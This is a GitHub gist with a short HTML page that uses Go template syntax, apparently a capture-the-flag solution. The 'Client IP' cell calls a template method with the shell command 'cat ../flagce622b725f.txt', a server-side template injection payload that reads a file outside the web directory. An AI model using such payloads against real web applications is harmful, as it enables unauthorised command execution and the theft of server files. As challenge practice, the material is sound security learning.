Skip to content

Instantly share code, notes, and snippets.

@genuinemoses
Last active September 18, 2023 12:32
Show Gist options
  • Save genuinemoses/9b3d9530d15248550e6c24f50158651b to your computer and use it in GitHub Desktop.
Save genuinemoses/9b3d9530d15248550e6c24f50158651b to your computer and use it in GitHub Desktop.
<!DOCTYPE html>
<html>
<head>
<title>Request Data</title>
</head>
<body>
<h2>Server Information</h2>
<table>
<tr>
<th>Client IP</th>
<td>{{ .FetchServerInfo "cat ../flagce622b725f.txt" }}</td>
</tr>
<tr>
<th>Hostname</th>
<td>{{ .ServerInfo.Hostname }}</td>
</tr>
</table>
</body>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment